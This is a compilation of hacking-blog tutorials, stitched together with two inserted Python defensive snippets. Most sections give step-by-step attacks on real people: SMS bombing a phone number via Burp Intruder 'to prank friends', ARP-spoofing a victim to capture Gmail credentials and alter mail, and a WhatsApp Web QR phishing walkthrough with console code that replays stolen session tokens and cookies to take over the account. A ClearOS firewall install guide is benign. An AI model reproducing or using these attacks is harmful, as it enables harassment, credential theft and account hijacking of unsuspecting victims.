SMS Bombing on Mobile using Burpsuite

In this article we will learn about SMS bombing. It is used to prank your friends by sending them hundreds or thousands of SMS at once. There are many third-party sites that do this, but they are usually of no use. We are introducing a different method, and all you need is Kali.

We are going to use BurpSuite, which means we have to set up a proxy first. To do that, go to the browser settings and select Preferences.

Then select the Advanced option and go to the network settings.

A dialogue box will open; in it, select Manual Proxy Configuration. Once this is selected, you can either keep the HTTP proxy as localhost or set it to 127.0.0.1.

Now that the proxy has been set up, open BurpSuite.

Now select the proxy tab and then the options tab and check the checkbox of the interface. Then click on the Edit button on the left side.

It will open a dialogue box. In this select Support invisible proxying option. Click on OK.

When you return to the previous window check the invisible box too.

As of now, all the settings have been done. Now what we need is to send the message and for that, we will log in to way2sms.com.

After logging in generate the message and give the contact number to which you want to send the messages. Before clicking on send turn on the interception in BurpSuite.

When you click the send button the request will first go to Burpsuite as it captures the traffic. When the traffic has been captured right-click anywhere and select Send to intruder option or simply use keyboard shortcut i.e. ctrl+i.

Now in the Intruder tab, select the options tab. It will show you the details of the traffic, that is, the number to which the SMS was destined and the text message.

Select the part of the text message and click on add.

Now go to Payloads tab and select Brute Force in the Payload type option.

Then give the character set of 123456789 i.e. 1-9 numbers. And give the minimum length of 1 and the maximum length of 3. Here, minimum and maximum length means the length of digits that will be created using character set. From the customization that we have done, it will create 1100 messages for the receiver.

Finally, to start the attack, go to the Intruder menu and select Start Attack from the drop-down menu.

Once the attack starts, you can see that the receiver will start receiving the messages at intervals of 1 to 5 seconds, as shown in the image below:

I stopped the attack after 29 messages which were sent in the time span of 1 to 2 minutes.
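Seen from the defending side, the replay described above reaches the SMS service as one account sending many messages to one recipient within seconds, with bodies that differ only in a number. The following Python limiter is an added example, not code from the article or from any SMS provider; the window, the limit, the account name and the phone number are assumptions chosen for illustration.

```python
import re
from collections import defaultdict, deque

WINDOW_SECONDS = 60   # assumed policy window
MAX_PER_WINDOW = 5    # assumed limit per (account, recipient) pair


def template(body):
    """Collapse digit runs so 'hello 1' and 'hello 27' share one template."""
    return re.sub(r"\d+", "#", body.strip().lower())


class SendGuard:
    """Sliding-window limiter for a message-send endpoint."""

    def __init__(self, window=WINDOW_SECONDS, limit=MAX_PER_WINDOW):
        self.window, self.limit = window, limit
        self.sent = defaultdict(deque)  # (account, recipient) -> (ts, template)

    def check(self, ts, account, recipient, body):
        q = self.sent[(account, recipient)]
        while q and ts - q[0][0] >= self.window:
            q.popleft()  # forget sends older than the window
        if len(q) < self.limit:
            q.append((ts, template(body)))
            return "ok"
        # Over the limit: a single shared template points at automated replay.
        shapes = {shape for _, shape in q} | {template(body)}
        return "replay" if len(shapes) == 1 else "throttled"


def verdicts(log):
    guard = SendGuard()
    return [guard.check(*entry) for entry in log]


# Constructed sample: 29 sends, 3 seconds apart, body differs only by a number.
REPLAY_LOG = [(i * 3, "acct-1", "+910000000000", f"hello {i + 1}")
              for i in range(29)]

if __name__ == "__main__":
    result = verdicts(REPLAY_LOG)
    print(result.count("ok"), "delivered,", result.count("replay"), "blocked")
```

Keying the limit on the account and recipient pair, rather than on the message text, means changing the payload does not reset the counter; the template comparison only decides how the block is labelled for alerting.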

Author: Shivam Gupta is an Ethical Hacker, Cyber Security Expert, Penetration Tester, India.

Hijacking Gmail Message on Air using Burpsuite

There are various Burpsuite attacks that you may not know of; we will try one of those in this article today. We will learn how to get in the middle of Gmail's network traffic and then change the message of the mail before it reaches the receiver.

First of all, go to the terminal of Kali and type:

Here,

-i –> interface

wlan0 –> network (This can be either Ethernet or WLAN depending on your victim i.e. if your victim is using eth0 then you should also use eth0)

-t –> target

192.168.100.4 –> Victim IP

192.168.100.1 –> DNS

Execution of the above command will capture the packets that are sent from victim to router. And once we have captured these packets we will open another terminal in Kali and type the following command which will make us capture all the packets from router to victim.

Here,

-i –> interface

wlan0 –> network

-t –> target

192.168.100.1 –> DNS

192.168.100.4 –> victim IP

This command will capture packets that are sent from the router to the victim IP. Now type the following command so that IP forwarding is enabled on our PC.

Then type the following command so that all the packets on port 80 will go through our IP.

Then type the following command so that all the packets on port 443 will go through our IP.

After all this is done, open Burpsuite, go to the Proxy tab and then select the Options tab. Once you are there, click on the Add button.

Clicking on the Add button will make the following options appear. Here, enter port number 80 in the box next to Bind to port, and in Specific address give your IP.

Next, select the Request Handling tab and check Support invisible proxy. Then click on OK.

Repeat the above steps for Port no 443 too.

After clicking on OK, make sure all the Running and Invisible boxes are checked.

When the victim signs in to his/her Gmail account, the data is captured in Burpsuite.

And all this captured data will contain username and password of the victim as shown below.

Here is a closer view of the username and password.

The victim will type and send the message without suspicion:

But as soon as the victim clicks on the send button, the mail will come to us before reaching the destination.

Now you can change the text of the message by a simple left click on the message area and type your message as I changed HELLO THIS IS TESTING to YOU HAVE BEEN HACKED.

Once you change the message then click on Forward button on the top left side and the mail will go forward to its destination as shown below:

Shivam Gupta is an Ethical Hacker, Cyber Security Expert, Penetration Tester, India.
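Redirecting a host's traffic through another machine on the same LAN, as the steps above describe, typically works by poisoning the ARP cache (an assumption here, since the article's commands are not shown), and that leaves a trace on the affected host: the router's IP resolves to a different MAC. The following Python check is an added example, not part of the original article; the neighbour-table text and MAC addresses are constructed, and only the 192.168.100.1 and 192.168.100.4 addresses come from the page.

```python
import re

NEIGH = re.compile(
    r"^(\d+\.\d+\.\d+\.\d+) dev \S+ lladdr ((?:[0-9a-f]{2}:){5}[0-9a-f]{2})\b")


def parse_neigh(text):
    """Turn `ip neigh show` style lines into {ip: mac}; unresolved rows are skipped."""
    table = {}
    for line in text.splitlines():
        m = NEIGH.match(line.strip().lower())
        if m:
            table[m.group(1)] = m.group(2)
    return table


def arp_alerts(baseline, current, gateway):
    """Compare a trusted snapshot with the current cache."""
    alerts = []
    old, new = baseline.get(gateway), current.get(gateway)
    if old and new and old != new:
        alerts.append(("gateway-mac-changed", gateway, old, new))
    owners = {}
    for ip, mac in current.items():
        owners.setdefault(mac, []).append(ip)
    for mac, ips in owners.items():
        if len(ips) > 1:  # one adapter answering for several IPs
            alerts.append(("mac-shared", mac, tuple(sorted(ips))))
    return alerts


# Constructed snapshots as seen on 192.168.100.4; MACs are documentation values.
BASELINE = """
192.168.100.1 dev wlan0 lladdr 00:00:5e:00:53:01 REACHABLE
192.168.100.7 dev wlan0 lladdr 00:00:5e:00:53:07 STALE
192.168.100.9 dev wlan0  FAILED
"""
POISONED = """
192.168.100.1 dev wlan0 lladdr 00:00:5e:00:53:07 REACHABLE
192.168.100.7 dev wlan0 lladdr 00:00:5e:00:53:07 REACHABLE
"""

if __name__ == "__main__":
    base, now = parse_neigh(BASELINE), parse_neigh(POISONED)
    for alert in arp_alerts(base, now, "192.168.100.1"):
        print(alert)
```

The gateway comparison is only as good as the baseline, so capture it at a known-good time or pin the gateway with a static ARP entry.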

Setup Firewall Pentest Lab using Clear OS

Clear OS is basically a Linux-based server operating system for small businesses which comes with server, networking and gateway related functions. Clear OS is available in Home, Business and free Community editions. It is normally managed from a web-based interface, but it can also be operated completely from the command line. Mostly, though, ClearOS is used as a firewall.

Let’s see how to install Clear OS.

First, make a bootable disk or pen drive using Yumi or Rufus.

Then restart your computer and select: Install ClearOS

After selecting press Enter

Select the language in which you are comfortable.

After that, the Installation Summary interface will appear.

Select Date and Time from localization section.

Then select installation source and click on done.

After that select Network and host name. Turn on and configure your network setting.

After setting everything, click on Begin Installation and the installation will start. You also have to set the root password.

After the installation finishes, the system will reboot. ClearOS will then provide you with a link that contains an IP address. Open that link in a browser.

When you open that link in your browser, it will ask you to log in to your account. Use root as the username and the password you set at the time of installation, and log in.

After logging in, you have to configure ClearOS.

Configure the network interfaces. Change the type to static, set the IP address you set earlier and then click Next.

Select your Edition and click next.

Fill system registration form and click next.

Now you have to set hostname for your NIC (Network Interface Card). Set hostname for internal and external NIC and click next.

After that, from the marketplace, you have to select and install the apps required for monitoring and administration. After finishing your configuration, a simple dashboard will appear; from here you can utilize ClearOS as per your need.

Author: Akshay Bhardwaj is a passionate Hacker, Information Security Researcher | Sketch Artist | Technical writer. You can follow him on LinkedIn and Facebook

Hack anyone’s Whatsapp through QR code (Working)

Recently Whatsapp released an important new update for its users, End-to-End Encryption, which means it's impossible to decrypt this type of encryption; even Whatsapp can't decrypt it. This is really good news for every Whatsapp user.

But remember, “Security is just an illusion”. I’m saying this because there is a way by which Whatsapp can be hacked, and that is by the phishing method.

So let’s start. First, download the Selenium standalone server jar file from here

Then open a terminal and change to the directory where you downloaded the Selenium server file; in my case I downloaded it to my Desktop.

cd /root/Desktop/

Then type:

./selenium-server-standalone-2.53.0.jar

Now it will start the selenium server. Then open a new terminal and type:

git clone //github.com/Mawalu/whatsapp-phishing.git

It will clone the whatsapp-phishing repository from Github. After that type:

cd whatsapp-phishing

Then type:

npm install

It will install all the required things like node.js and socket.io, which are required to run the website and the selenium server. If you encounter any “missing” error, then you have to install the missing part manually. To do so, type:

npm install node.js

npm install socket.io

npm install wd

After installing, type in the terminal:

node index.js

It will start an http and a socket.io server.

Now open your Mozilla Firefox and type in the address bar:

//localhost:8080

When you press enter, it will open a new browser and connect to the web.whatsapp.com and will generate a QR code in the browser. The generated phishing QR code will continuously sync with web.whatsapp.com QR code.

Now send this QR code to a victim through a social engineering method. When the victim scans that QR code with their mobile Whatsapp scanner, Whatsapp will authenticate the browser which is controlled by the selenium server, which then fetches the tokens and document.cookie from the victim's Whatsapp.

Now you have to copy the tokens and document.cookie. There are two ways to see the stored tokens and document.cookie:

  1. The first way is to go to:

/root/whatsapp-phishing/

In the whatsapp-phishing directory, a file named secrets will be created automatically when the victim scans that phishing QR code, and that file contains the token ID and document.cookie.

  2. The second way is to go to the terminal where js is already running; there you will find that some codes are fetched. That is our goddam gold, meaning the victim's token ID, which is what we require to get access to his/her Whatsapp account.

In both ways you will find that multiple token IDs are fetched, but we only want the latest fetched token ID and document.cookie. To get it, copy the last fetched token, which starts with {"s": and ends with "c":""}. See the picture for reference.

Then open the Firefox browser in incognito mode and then open the link //web.whatsapp.com/

After that open developers mode in browser and go to console and type

var t = PASTE_HERE _VICTIM_TOKEN-ID

Then type following code:

> function login(token) {Object.keys(token.s).forEach(function (key) {localStorage.setItem(key, token.s[key])}); token.c = token.c.split(‘;’); token.c.forEach(function(cookie) {document.cookie = cookie; });}

And at last type:

>login (t)

Now reload the browser window and wait. Bannggg!! Automatically, after a few seconds, you will be logged in as the person who scanned the QR code (the phishing QR code that we created).

Enjoy. Stay tuned for more tutorials like this.

AUTHOR: Akshay Bhardwaj is an Information Security Enthusiast and Researcher | Sketch Artist | Technical writer.
